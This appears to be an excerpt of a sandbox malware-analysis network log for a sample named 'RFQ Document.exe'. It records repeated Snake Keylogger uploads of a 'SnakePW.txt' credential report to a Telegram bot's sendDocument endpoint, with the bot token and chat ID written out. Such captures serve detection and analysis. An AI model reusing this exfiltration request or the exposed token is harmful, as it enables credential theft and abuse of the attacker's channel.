                                            2021-09-28 05:59:03 UTC240OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 62 36 62 37 32 31 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255db6b7218Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:03 UTC240INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:03 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:03 UTC241INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 33 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 33 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12737,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808743,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            151192.168.2.449958149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:03 UTC241OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255db91981c
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:03 UTC241OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 62 39 31 39 38 31 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255db91981cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:03 UTC242INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:03 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:03 UTC242INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 33 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 33 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12738,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808743,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            152192.168.2.449960149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:04 UTC243OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255dbae3519
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:04 UTC243OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 62 61 65 33 35 31 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255dbae3519Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:04 UTC243INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:04 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:04 UTC244INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 34 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 34 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12740,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808744,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            153192.168.2.449962149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:04 UTC244OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255dbd459f3
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:04 UTC245OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 62 64 34 35 39 66 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255dbd459f3Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:04 UTC245INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:04 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:04 UTC245INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 34 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 34 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12741,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808744,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            154192.168.2.449964149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:04 UTC246OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255dc197d55
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:04 UTC246OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 63 31 39 37 64 35 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255dc197d55Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:04 UTC247INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:04 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:04 UTC247INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 34 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 34 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12742,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808744,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            155192.168.2.449965149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:05 UTC247OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255dc3fa396
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:05 UTC248OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 63 33 66 61 33 39 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255dc3fa396Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:05 UTC248INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:05 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:05 UTC249INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 34 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 35 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12743,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808745,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            156192.168.2.449967149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:05 UTC249OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255dc5ea195
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:05 UTC249OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 63 35 65 61 31 39 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255dc5ea195Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:05 UTC250INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:05 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:05 UTC250INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 34 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 35 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12744,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808745,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            157192.168.2.449968149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:05 UTC251OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255dcc2c405
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:05 UTC251OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 63 63 32 63 34 30 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
